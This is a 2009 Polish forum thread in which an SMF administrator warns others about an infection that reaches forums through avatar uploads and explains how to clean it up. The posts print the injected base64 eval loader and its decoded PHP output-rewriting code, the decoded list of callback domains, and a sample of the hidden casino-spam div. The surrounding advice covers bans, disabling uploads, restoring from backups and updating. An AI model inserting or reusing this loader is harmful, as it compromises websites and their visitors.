SMF HELP!

SMF Help! - For Users SMF/TP => I N F O i Komunikaty - Czytaj! => Wątek zaczęty przez: roco 09.05.2009 08:34:51



Tytuł: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 09.05.2009 08:34:51
Witam, cześć i czołem.. Niestety jest powazna sprawa!


Pojawił się w sieci Exploit, który infekuje forum na skrypcie SMF.

Zainfekowaniu ulegają dosłownie wszystkie pliki z rozszerzeniem *.php w całym katalogu z SMF, łącznie z podkatalogami.

Procedura wykonania kodu polega, na tym, że niejaki:

krisbarteo

IP: 94.142.129.147

Nazwa hosta: 94.142.129.147

Email: krisbarteo@gmail.com

Nazwa użytkownika: krisbarteo


- zakłada konto, przechodzi procedurę rejestracyjną i prawdopodobnie za pomocą formularza
do wysyłania własnego Avatara na server, wkleja tam do formularza, złośliwy kod
lub wysyła na serwer spreparowany plik graficzny, który jest zupełnie czymś innym,
skutkiem czego ulega "zakażeniu" niekiedy parę setek plików.
Trzeba zajrzeć do katalogu Attachments i tam powinien być 1px plik np. Avatar85.jpg - do wywalenia!.

Exploit dopisuje na początku każdego napotkanego pliku, tj przed < ? php zakodowany kod,
który jest adresem instalki Exploida:

GeSHi -› Code: [select]
<?php /**/eval(base64_decode(&#39;aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdXNlcnMveHh4eHgvd3d3L3h4eHh4eC90cC9GQ0tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy91c2Vycy94eHh4L3d3dy94eHh4eHgvdHAvRkNLZWRpdG9yL2VkaXRvci9maWxlbWFuYWdlci9icm93c2VyL2RlZmF1bHQvaW1hZ2VzL2ljb25zLzMyL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19&#39;)); ?>
<?php
// itd.. tu reszta w&#322;a&#347;ciwego pliku
?>
// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.031s | speed:39.80 KB/s



Po zdekodowaniu - kod wygląda tak:

GeSHi -› Code: [select]
<?php if(function_exists(&#39;ob_start&#39;)&&!isset($GLOBALS[&#39;sh_no&#39;])){$GLOBALS[&#39;sh_no&#39;]=1;if(file_exists(&#39;/users/xxxxx/www/xxxxxx/tp/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php&#39;)){include_once(&#39;/users/xxxx/www/xxxxxx/tp/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php&#39;);if(function_exists(&#39;gml&#39;)&&!function_exists(&#39;dgobh&#39;)){if(!function_exists(&#39;gzdecode&#39;)){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack(&#39;v&#39;,substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header(&#39;Content-Encoding: none&#39;);$c=gzdecode($b);if(preg_match(&#39;/\<body/si&#39;,$c)){return preg_replace(&#39;/(\<body[^\>]*\>)/si&#39;,&#39;$1&#39;.gml(),$c);}else{return gml().$c;}}ob_start(&#39;dgobh&#39;);}}} ?>
// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.025s | speed:39.32 KB/s



 Jak widać, (to akurat jest na SMF + TP, ale jak go nie ma to instaluje w innym miejscu), w tym wypadku instalka Exploita leci tu:

/users/xxxxx/www/xxxxxx/tp/FCKeditor/editor/filemanager/browser/default/images/icons/32/

Do środka jest wrzucony zakodowany plik: style.css.php

Teraz, kiedy w nagłówku każdego pliku *.php jest adres pliku style.css.php, to kiedy jesteśmy na forum i klikamy na różne linki i robimy różne rzeczy.. to w folderze z plikiem style.css.php - kolektują sią różne pliki, bez żadnego rozszerzenia. Głównie to reklamy kasyn i podobne duperschwanze.. Ale w śród tych plików ukrywa równiesz swoje configi.

itd itp ect, juz nie będę was zanudzał co dalej..

Jak się obronić?

- Trzeba sprawdzić czy na liście userów jest niejaki - krisbarteo i zbanować to konto, ale nie usuwać!

Trzeba dodac nowy ban, lub z konta tego "usera" kliknąć "zbanuj tego użytkownika"


I ban powinien wygladać tak:

(http://poligon.ricoroco.com/fora/foto/uploads/e8ffa2ae76.jpg)

Ale ostatnie pole wypełniamy tylko wtedy, kiedy faktycznie już jest zarejestrowany inaczej zostawiamy puste, bo wywali errora.
Tzn. nawet kiedy nie ma takiego usera, to dajemy "pusty" ban z dokładnie takimi wpisami jak na rysunku, ale bez ostatniego pola input

To sa wszystkie dane potrzebne do bana:

Nazwa Bana: krisbarteo

IP: 94.142.129.147

Nazwa hosta: 94.142.129.147

Email: krisbarteo@gmail.com

Nazwa użytkownika: krisbarteo


Jeśli to zrobią osoby, które administrują fora na skrypcie SMF, to unikną włamu.
Jeśli nie było jeszcze włamu, to należy skopiować na dysk całe forum.
- wtedy, jak się to zdarzy, należy np. zmienić nazwy katalogom, plikom i wrzucić pliki na serwer z kopii.

Jeśli to już się stało, to czeka nas kawał roboty, ponieważ należy pousuwać wszystkie złośliwe wpisy.
Ale kiedy mamy kopię, to zmieniamy nazwy plikom/folderom głównycm i podmieniamy pliki, jeśli nie,
- to kasacja obcych plików i edycja wszystkich plików *.php w całym głównym katalogu z forum.


Exploit jest przygotowany do zaspamowania forum linkami i opisami comercyjnych stron (kasyna itp).
Może również "kablować" wrażym twarzom na Litwę..:

ENCODE:

Code: [select]
ZGd1aA== = "aHR0cDovL25vbXNhdDIzLm5ldC87aHR0cDovL25zc2F0My5jb20vO2h0dHA6Ly93cGxzYXQyMy5uZXQv"



DECODE: (tego co powyżej)

Code: [select]
http://nomsat23.net/;http://nssat3.com/;http://wplsat23.net/



Należy się zabezpieczyć.

- Ban to podstawa, nawet kiedy nie ma jeszcze takiego usera, to i tak dokonujemy bana, tylko nie podajemy ostatniego pola.
- Należałoby zabronić userom, chocby tym podstawowym, wgrywania foty Avatara, tylko zostawić wybór z tego co jest.
- Trzeba kontrolować pliki, logi z servera, sprawdzać czy nie zarejestrował się nowy user o xywie krisbarteo i być czujnym.

Zbiera on niezłe żniwo.. http://www.google.pl/search?hl=pl&q=krisbarteo&btnG=Szukaj+w+Google&lr=&aq=f&oq= (http://www.google.pl/search?hl=pl&q=krisbarteo&btnG=Szukaj+w+Google&lr=&aq=f&oq=)

Można też wgrać moda: http://custom.simplemachines.org/mods/index.php?mod=1547 (http://custom.simplemachines.org/mods/index.php?mod=1547) ale są i inne.

Napisałem o tym, ponieważ jesteście na liście Exploita, ponieważ wyszukuje on fora SMF po stopce: Powered by SMF
http://www.google.pl/search?hl=pl&q=Powered+by+SMF&btnG=Szukaj+w+Google&lr=&aq=f&oq= (http://www.google.pl/search?hl=pl&q=Powered+by+SMF&btnG=Szukaj+w+Google&lr=&aq=f&oq=)
i jeszcze ~24 miliony stronek..

Okay, mam nadzieje, że ten wpis uratuje choć jedną duszę.

Pozdrawiam wszystkich :)
Roco


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 09.05.2009 08:42:30
Niestety ale rozprzestrzenia sie dosć szybko.. Chciałem ostrzec mojego przyjaciela Unicorna, który ma forum na skrypcie SMF, ale niestety został już zainfekowany.

To widać w podgladzie strony: (wkleję tylko ten kawałek, gdzie widać wredną robotę Exploita)

GeSHi -› Code: [select]
</head>
<body><div style="display:none"><!--130543624--><p>My team and I are led by the understanding that these efforts should be made systematically, through a package of legislative and regulatory, institutional and functional actions to achieve lasting and sustainable results in the combat against offences of&#160; <a href="http://forum.redwall-firewall.com/index.php/?etv=156">the daily 3 lottery</a>&#160; rules and regulations. <!--628390374--><p>Further communications will occur between you and the&#160; <a href="http://www.bttvalencia.com/index.php/?xmwa=103">new jersey cash 5 lottery results</a>&#160; only, without our intermediation. <!--436125521--><p>This article seeks to highlight some of the issues that should be taken into&#160; <a href="http://www.eriwebdesign.com/hummingbirdsystems/index.php/?ltdb=172">how to win on lottery tickets</a>&#160; during the ongoing debates around the cash-in-heists in South Africa. <!--323113706--><p>Cash&#160; <a href="http://terrakroma.com/forum/index.php/?zosw=153">monte carlo casino las vegas</a>&#160; machine - US Patent 5626821 from Patent Storm. <!--696514532--><p>Usually these loans cost (percentage-wise) much more then an average mortgage, often times up to twice what a regular&#160; <a href="http://www.smitalia.net/community/index.php/?luuq=117">the casino brawl reenact</a>&#160; does, plus high origination fees. <!--885401978--><p>This study sought to determine why some families live outside the government&#160; <a href="http://straightmusichouse.com/bbs/index.php/?yjfz=142">resort and casino tunica</a>&#160; income support system despite extreme poverty. <!--778589255--><p>Transparent&#160; <a href="http://forum.synesthesie.info/index.php/?jkbv=44">british new year lottery</a>&#160; reporting is essential for efficient resource allocation. <!--52513688--><p>The director of the new Johnny&#160; <a href="http://thekokiris.net/forum/index.php/?rysm=44">kenosha dog track</a>&#160; stage musical, "Ring of Fire," struggles to define exactly what the show is, but one thing is certain -- no one portrays the country music legend known as "The Man in Black. <!--221362381--><p>Check Cashing&#160; <a href="http://cymonsgames.retroremakes.com/pages/cursesexamples/magic.c/?hhdk=28">frequent winning lottery numbers</a>&#160; Advance, Check Cashing Service, yellow pages, New Haven,CT, directory, local search, phone directory, maps, directions, more information,local information, telephone directory, refine search. <!--166232151--><p>Five years of non-stop&#160; <a href="http://csshook.com/menudesign/wp-content/plugins/custom-anti-spam/custom_anti_spam.php/?bzf=99">casino free games</a>&#160; without any failure and breakdown is a strong argument, isn&#39;t it? <!--563266390--><p>The majority of products in most companies are&#160; <a href="http://www.bowenbaptist.org/forums/index.php/?buke=40">poker calculator on</a>&#160; traps. <!--531148499--><p>Given your attitude to risk, you have an ideal&#160; <a href="http://perfectillusions.net/dnl/download.php/?hrbi=182">iowa lottery authority</a>&#160; balance. <!--612217588--><p>At Central Car Loans, bad&#160; <a href="http://transvisionbike.com/comun/index.php/?ilpz=59">double eagle casino cripple creek colorado</a>&#160; history is no longer a hurdle. <!--383249644--><p>With the checkout operator in a sitting position, it was found that movement of the&#160; <a href="http://www.gelono.com/index.php/?irmw=169">blackjack free downloads</a>&#160; drawer from a closed to an open position interfered with the operator when in a sitting position. <!--215243964--><p>This article discusses recovering&#160; <a href="http://larrydavidfan.com/forum/index.php/?snb=90">party poker com</a>&#160; and ways to speed up payment after the invoice has been sent out to your customer. <!--211671441--><p>and means for controlling to drive the informing means when the number of&#160; <a href="http://www.plateau-trivial.de/smf/index.php/?dlcz=79">knut h flottorp</a>&#160; detected by the detecting means exceeds a predetermined standard value, the standard value being a positive integer greater than zero. <!--822230951--><p>However, the figures below are helpful as a basis for&#160; <a href="http://www.diaspora-isulana.com/forum/index.php/?wzdk=58">palace station hotel casino</a>&#160; planning. <!--443519299--><p>METHOD AND SYSTEM FOR&#160; <a href="http://eve-au.com/forum/index.php/?pfba=156">dream of winning the lottery</a>&#160; MAXIMIZATION CROSS REFERENCES TO RELATED APPLICATIONS This application is a continuation in part application of commonly owned U. <!--902978824--><p>Account have&#160; <a href="http://rightsoup.com/tag/cnn-iousa/?anu=62">massachusetts lottery site</a>&#160; other people infoassist in search repayment. <!--596192608--><p>For beef cattle businesses, this would be the third consecutive decline in average net&#160; <a href="http://www.motousers.or.id/index.php/?vtuv=35">usa green card lottery result</a>&#160; income since peaking in 2005 at ,200. <!--948553536--><p>American Life Solutions is a life settlement broker providing creative&#160; <a href="http://www.acuariolatino.com/foro/?xqsl=66">free betting accounts</a>&#160; and estate planning options. <!--234863264--><p>I held onto the&#160; <a href="http://www.thaidelltalk.com/index.php/?ssgt=133">deposit required online casino</a>&#160; until I saw (MSU President) Dr. <!--485286826--><p>Do you want to take a chance on making a lot of&#160; <a href="http://islandsofwar.com/forum/index.php/?iudt=44">tournament poker results</a>&#160; but risk making nothing at all? <!--252339626--><p>Congress, Giving&#160; <a href="http://gnepal.com/forum/index.php/?ywop=70">ceredo kenova high school</a>&#160; to Foreigners, Obama&#39;s Global Poverty Act, Obama, Global Poverty Act, S. <!--702678907--><p>Here we&#160; <a href="http://filmunderfire.com/forums/index.php/?aabf=78">bingo bonus deposit</a>&#160; both the origin of her blog&#39;s name and the fact that her willpower only has a 365 day shelf life. <!--425682949--><p>We are licensed real estate brokers, in business for over 35 years in&#160; <a href="http://www.ucdvo.org/plogger/ucdvo_gallery.php/?iuzv=88">expekt poker review</a>&#160; properties including residential, residential income, commercial, and land. <!--128315421--><p>top the internet&#160; <a href="http://www.theheritagehunters.com/forum/index.php/?vrfd=167">riviera casino las vegas nv</a>&#160; tables with impressive headline rates, they are notably absent from the consistency tables. <!--697321308--><p>The Petty&#160; <a href="http://heliciculture.escargot-blond-des-flandres.com/provence-alpes-cote-dazur/?lyrw=136">epiphone casino ebony</a>&#160; Fund custodian is responsible for ensuring proper safekeeping and handling of the fund. <!--722667181--><p>Contact us to find out how you can gain the benefits of&#160; <a href="http://www.robux.co.uk/games/forum/index.php/?jfdh=0">lottery commission annual report</a>&#160; receivable factoring for your business. <!--529213610--><p>hedging transaction, the&#160; <a href="http://www.heimbrauforum.de/index.php/?esyp=86">texas holdem poker tournament rules</a>&#160; is considered as being in that currency. <!--4734030--><p>In this paper we consider the question of how much our society is willing to spend to&#160; <a href="http://broncoii.org/forum/index.php/?cwni=8">understanding baseball betting lines</a>&#160; a life in various contexts. <!--751541121--><p>The&#160; <a href="http://newcastlegreengathering.co.uk/talk/index.php/?tigl=156">free online video poker slots</a>&#160; drawer system of claim 9 wherein the drawer is laterally movable when the drawer is latched to the second rail of the first slide and the second rail of the second slide. <!--748860300--><p>It&#39;s optimized for the search engines and ready for you to start making&#160; <a href="http://www.forum-psoriasis.com/forum/index.php/?yext=156">michigan casino list</a>&#160; NOW! <!--929633414--><p>For purposes of this policy the emphasis on controls will generally be related to the methods and practices necessary to ensure the safeguarding of University&#160; <a href="http://www.miss-barrymore.com/photos/thumbnails.php/?lbjf=27">california casinos craps</a>&#160; collections and change funds. <!--699126562--><p>After the deposit of&#160; <a href="http://www.leolog.com/2006/10/26/mechero-con-linux/?show_page=37">of harrah casino</a>&#160; and the giving of any change, the drawer is pushed back by the operator to close the till in preparation for further actuation of the keys in the next transaction. <!--169057327--><p>FRIDAY, March 7 (HealthDay News) -- Extra government&#160; <a href="http://www.robertkazinsky.org/forum/chat/admin/connlist.php/?djlz=168">poker superstars two</a>&#160; support of poor families boosts children&#39;s physical and mental development, a U. <!--922447893--><p>Why is the&#160; <a href="http://islamemlinha.com/index.php/?ehqk=166">online betting wiki</a>&#160; flow from operating activities relevant? <!--831198880--><p>We can provide branded indoor, outdoor and mobile&#160; <a href="http://www.fibertothewhatever.com/wikifiber/index.php/?bmfk=125">sandia casino ampitheater</a>&#160; machines for placement at your location. <!--220320452--><p>Ampminsure is a community that offers a participatory platform to discuss over&#160; <a href="http://www.raqsoft.com/forum/index.php/?xzzl=55">paris hotel and casino</a>&#160; related issues amidst a knowledgeable and experienced community. <!--634936683--><p>As yet, the harmonisation of regional&#160; <a href="http://www.bbloom.com/bbloomforum/index.php/?mwle=120">ruined leather scraps</a>&#160; and fiscal legislations remains to be done. <!--727993085--><p>calculates a sum value of the mean value and the numerical data of the degrees of influence of the quality factors as a predicted value of the demanded&#160; <a href="http://apiariocosmos.com.br/forum/index.php/?qklq=180">all no deposit casinos</a>&#160; amount. <!--325328556--><p>We charge a monthly interest on the&#160; <a href="http://thesluice.co.uk/forums/index.php/?pasq=48">video poker strategy</a>&#160; and you can reclaim your goods at any time within 7 months. <!--747136598--><p>A resident of Little Canada won the ,599 Northstar&#160; <a href="http://venicefla.us/forums/index.php/?wedk=121">online casino playtech</a>&#160; jackpot from the Sept. <!--461298572--><p>We also propose a scheme, transferable untraceable electronic&#160; <a href="http://www.mhooclub.com/webboard/index.php/?wxhi=172">e lottery international</a>&#160; scheme, satisfying transferability as well as the above two criteria. <!--340777660--><p>This type of loans can be repaid earlier than the maturity and provide&#160; <a href="http://www.fdd5-25.net/idtcpu.php/?wnuy=134">sandia casino albuquerque nm</a>&#160; availability to firms. <!--35306814--><p>Bloomberg European Central&#160; <a href="http://netfield.ludost.net/forum/index.php/?dpyv=74">and strole lottery</a>&#160; President Jean Claude Trichet signaled that he. <!--522794580--><p>Full reporting schools that classify&#160; <a href="http://basquet.deuruguay.com.uy/backend.php/?frup=36">casino first gambling web</a>&#160; deposits as investments are also to provide information about the weighted average effective interest rate and maturity dates. <!--398575917--><p>Usually they are always there to help their&#160; <a href="http://www.pinscher.no/forum/index.php/?imgx=138">for sale kenova wv</a>&#160; with special considerations, which may not be used in emergencies. <!--768283378--><p>Slots online super jackpot party, atlantic lounge casino, poker no deposit bouns, no deposit rtg casino codes, new online casino free&#160; <a href="http://replaygamez.com/forum/index.php/?mft=12">play pchlotto com</a>&#160; coupons. <!--13787321--><p>This provides the highest flexibility to changing&#160; <a href="http://carpetcleanerrental.net/robots.txt/?fmse=136">football betting magazines</a>&#160; conditions. </div>
<div style="width: 99%; border-left: 1px solid #826D54; border-right: 1px solid #826D54; margin: 0px auto;">
<table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
<tr>
&#160; &#160; <td width="100%" class="logo" style="background-image: url([url]http://cybertrash.netarteria.pl/cyber/Themes/bluefantasy/images/header_bg.gif[/url])">
// Created by GeSHi 1.0.8.10 | code: -› [code=HTML] | load:0.049s | speed:249.31 KB/s



Polecam się zabezpieczyć. ("gumka" nie wystarczy na ten syf...)

Pozdrawiam
roco


Tytuł: Odp: Uwaga! Exploid - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 09.05.2009 23:26:11
Dopiero niedawno co wybrałem ten skrypt a już on zaczyna być strzelnicą.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 10.05.2009 01:29:21
To niezupełnie tak.. Skrypt SMF, jest bezpieczniejszy niż IPB, który jest płatny i kosztuje więcej niż system operacyjny..
Wszystko co jest w necie nie jest bezpiczne i każy kto zamieszcza jakieś treści musi się liczyć z tym, że zostanie zhackowany, lub jego dzieła będą wyświetlane gdzie indziej.

Mi się wydaje, że ten exploid, to raczej taki test, przed czymś może grubszym...


Jeśli już stwierdzimy, że zostaliśmy zainfekowani, to należy skopiować, to co jest w stringu, pomiędzy a'postrofami i rozkodowanie, albo za bomocą Notepad++, lub za pomocą generatorka on-line, np. tu: http://www.generuj.pl/ (http://www.generuj.pl/) lub np. tu: http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx (http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx)

Chodzi o to, żeby zobaczyć, gdzie Exploit instaluje swój szajs, a widac to po rozkodowaniu. i wtedy czyszczenie zaczynamy, właśnie od tego miejsca.

Wycinamy te wszystkie pliki bez rozszerzeń ale również pliki:

- style.css.php
- dg.php
- s.php

Dopiero później edytujemy każdy z plików php i wycinamy to co na samym początku powklejał Exploit.
Jest z tym masę pracy, można ją zautomatyzować, jeśli ktos ma kopię wszystkich plików, po zainstalowaniu ostatniego moda, czy skórki, żeby było aktualne. Wtedy zmieniamy nazwy katalogów, np. dopisujac coś na końcu np.: Sources na >> Sources01 i wrzucamy z naszej kopi forum cały ten katalog... itd. Inaczej ręcznie musimy wyedytować każdy! dosłownie, kazdy plik php i usunąć fajans.

Pozdrawiam :)
roco

PS. Informacje które tu zamieściłem, pochodzą stąd, że mnie to spotkało osobiście, mam ponad 20 for na skrypcie smf i jedno zostało zaatakowane, choć @krisbarteo zarejestrował się u mnie na kilku. Rozkminiłem o co biega, rozkodowałem wpisy i go zwalczyłem. Napewno można spotkać info na temat tego Exploida w necie, jednak to co tu zostało opisane, przytrafiło mi się osobiście, zresztą wielu moim przyjaciołom również i natychmiast o tym napisałem. Mam nadzieję, że zrobią to również inni...

Zgadzam się na kopiowanie, dawanie linków i udostepnianie tego topa!
To ważne info dla wszystkich Adminów skryptu SMF i powinno o tym wiedzieć jak najwięcej osób!
Jeśli są jakieś pytania, to prosze pytać, nawet nie trzeba się rejestrować.
r.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 10.05.2009 07:14:42
Czyli rozumiem tak on atakuje tylko gdy się zarejestruje i tylko w sposób wysyłania awatara na nasz serwer z forum lub plików na forum.
Zbanowanie adresu i niedopuszczenie go do rejestracji a także zabronienie userom wgrywania awatarów (mogą powiedzmy używać tylko z zewnętrznych źródeł) ochrania nas tak jakby. Czy się mylę?


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 10.05.2009 09:45:35
Exactly!

Żeby mógł wykonać kod, to musi skorzystać z formularza, którym można wrzucić plik do katalogu attachmens. Tam trafia 1px spreparowana grafika, ale to kit. Chodzi o rozpakowanie kontenerka z syfem. Potrzebne są jeszcze warunki, żeby wykonywał się kod. Jak ich nie ma, to są tylko zaśmiecone pliki php.., kiedy się wykona, to masz powyżej próbkę.. co robi. Wrzuca do kodu strony ostylowanego do ukrywania diva: div style = " display:none " i tego nie widzisz, ale z zainfekowanej stronki lecą linki z opisami np. do stronek komercyjnych z ksynami itp.
itd..

Napisałem wyżej, dokładnie, - jak sobie z tym poradzić. Oczywiście to mogą być i inne dane, ponieważ na tym IP były i inne klocki, ale nie związane z bierzącym zagrożeniem. Można zablokować pulę adresów.

To wszystko, oczywiście robi nam kłopot, choćby dlatego, że wyjdzie kolejna łata, tylko z łatką na taką możliwość i trzeba będzie uaktualniać...

Tomeh, do wszytkich takich akcji, należy podchodzić z rezerwą. Kiedy robisz regularnie optymalizacje, kopie bezpieczeństwa - bazy i po każdej zmianie czyli zainstalowanie nowego moda, stylu, - kopię wszytkich plików, - to nie wiele może się satać, poza robotą naprawczą hehe

Pozdrawiam :)
roco


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 16.05.2009 11:24:45
to mam takie pytanie.

Mam tak że rejestracja musi być zatwierdzona przez adamina i widzę że zarejestrował się ten krisbarteo ale nie zatwierdziłem jego rejestracji ani nie zrobiłem jeszcze nic. Użytkownicy u mnie mogą mieć awatary tylko z zewnętrznego źródła. Co powinienem teraz zrobić. Wystarczy że nie zatwierdzę i usunę go czy coś innego. Czy koniecznie muszę coś tam banować i se zaśmiecać w ten sposób forum. Rejestrować mi się on może a ja  będę usuwał to. Moje forum to bardziej blog i nie chodzi tam o użytkowników bo to coś innego dlatego nie ma obawy że mam tak poustawiane wszystko a userzy będą źli.

Po za tym dziwne że nikt go nie złapał jak łamie prawo ciągle na tym samym adresie itp.

Ok czekam na odpowiedź  -dzięki.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 16.05.2009 14:30:29
Ten Exploit, poza pracą do wykonania, nie wywołuje większych szkód. Nie znam motywów, ale może powstał po to, żeby zwrócic uwagę na niedociągnięcia smf? A może w innym celu, np. żebyśmy się bali i siali panikę wokół?

Znalazłem parę dni temu trochę czasu i poczytałem tamtejsze tipsy.. (na smf.org, bo na smf.pl nawet nikt bąka nie puści.. w temacie), jak dla mnie to bzdura! Wręcz uważem, że to byłoby niegrzeczne z mojej strony w stosunku do moich userów, gdybym to wysztko powyłączał w psizdu..

Tomeh, mówię Ci nie masz co pekać, jest ok! keep smiling :)

Wystarczy, ten mod, o którym pisałem wyżej, a min akceptacja przez admina nowych rejestracji. Po za tym możesz utworzyć grupę "przedszkolną" i tam zazwolić im tylko na trochę. Jak większość ma avki to spox, a jak by kto chciał to możesz mu sam uploadować na swoich uprawnieniach. jednak myślę, że to to nie jest konieczne. Bybór avka tylko z tego co już tam masz, lub sam wrzuciłeś, a nie z zewnątrz!, ponieważ to też nie jest pewne, choc z innych powodów.

Po pierwsze dodaj nawet "pustego" bana (czyli bez 4 pola), tak jak podałem to wyżej.
Jeśli się pojawił i czeka na akceptację, to mu jej nie dajesz a on dalej czeka.. To wyszkolony spambocik i pójdzie po prostu dalej. Wyszukuje ofiary za pomocą googlary po stopce, co też możnaby unieszkodliwić, tylko, że to działanie długoterminowe, jeśli już zostałes zaindexowany. no i p[rzedewszystki to szkodliwe dla właściciela forum.. w sensie SEO...

Nie usuwaj go, bo to tak jakbyć wyczyścił tablice w szkole z kredy, jest znowu czysta i można po niej pisać.
Pisałem o tu, ja go nie usunąłem, tylko zbanowałem..

A jak go usuniesz, to sam dajesz mu możliwość przyjścia ponownie.. to chyba logiczne, nieprawdaż?

Można dodać jego IP jako zabroniony do pliku .htaccess, (pisałem o tym w topiku "Spambots.."), tylko wtedy nie będziesz nawet wiedział, że krisbarteo coś próbował u Ciebie, a jak dasz bana, nawet pustego, to w tabelce pojawi się liczba "trafień", czyli wiadomo by było ile razy próbował i czy w ogóle....

Mozna się zabezpieczyć, alebo biernie czekać aż przyjdzie, a jesli hmm nie zabraknie mu prądu w jego akumulatorach, to będzie dotąd się przemieszczał, aż odwiedzi wszystko to co może znaleźć np. w google..

W sumie to taki joke.., małe bzi.., trochę pracy,? dla wprawy? hehe
- ale dosłownie Każdy musi się liczyć, że jest możliwym, iż do niego zawita ta maszynka! Nie tylko dotyczy to skryptu SMF, również Joomli! i wszystkich CMS'ów, które korzystają z FCKedytora, lub dają możliwość rejestracji i wrzuty własnego avka z dysku..

To tyle.. nie ma co pękać, ale przygotować się warto i jest hmm mądrze..? ;)

Pozdrawiam :)
roco


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 21.05.2009 06:05:41
W końcu przyszła długo oczekiwana aktualizacja (20.05).
Sporo drobnych i zastarzałych zmian, może trochę utrudniać, ale i tak zmany były konieczne!
Zozwiązane problemy z bezpieczeństwem nie tylko z ostatnim Exploitem.

Polecam wszyskim Adminom SMF jak najszybszą aktualizację! Oczywiście, jeśli macie wcześniejsze wersje, to należy uaktualniać etapami, czyli po kolei, aż do ostatniej. To ważne inaczej smf odmówi wam współracy..

Wszystkie pakiety, (gdyby coś nie szło normalnym trybem), znajdziecie tu: http://download.simplemachines.org/ (http://download.simplemachines.org/)

Aktualizacja dotyczy:

SMF: - v 1.1.8 >> v 1.1.9

oraz

SMF: - v 2.0 RC1 >> v 2.0 RC1.1

Najgorzej, gdy ktoś sam poprawia pliki jak np. ja hehe, wtedy są problemy z aktualką, ale spoko!
Jeśli będą problemy, to piszcie.

Pozdrawiam :)
roco


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 21.05.2009 11:12:45
Ale jak to uaktualnić z 1.1.8 do tego 1.1.9 ściągam paczkę large upgrade tak i co dalej. W dziale modyfikacje link do uaktualnia oczywiście mi nie działa 404 forbiden wyskakuje. Nie wiem co robić aby to uaktualnić.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 21.05.2009 11:34:31
Ależ.. masz na czerwono w PA, zaraz nad info z smf.org ew. kiedy klikniesz na pakiety.
Pojawia się informacja że twoje forum wymaga aktualizacji i w tym czerwonym polu jest link, po kliknieciu nastąpi aktualizacja.
Oczywiście tak jak w przypadku innych modyfikacji, nastąpi przekierowanie i zobaczysz wypisane te pliki i jeśli gdzieś będzie nie tak, to trzeba dłubnąc w plikach, ale nie sądzę. Tomku, nie licząc tego co na localhoście, zaktualizowałem 23 fora w mniej niż 10 minut!
Naprawdę nic skomplikowanego.

Oczywiście, jak by był jakiś problem to pisz.

Pozdrawiam :)
roco

// Edit: Dopiero jak by nie poszło z automatu to wrzuca się paczkę tak jak przy wrzucaniu moda, normalnie z PA. Ale nie wierzę, żeby aktualka sprawiała kłopot.

// Edit 2: Dobra, ok, to po ostatniej wersji, jest zaostrzenie i odbija się na sesji, jednak ta modyfikacja to również poprawia.

- Zmień u siebie w profilu styl na default i wejdź do PA i ponów,
- jeśli nie pójdzie to klikasz na pakiety i tam też jest ten link do aktualki

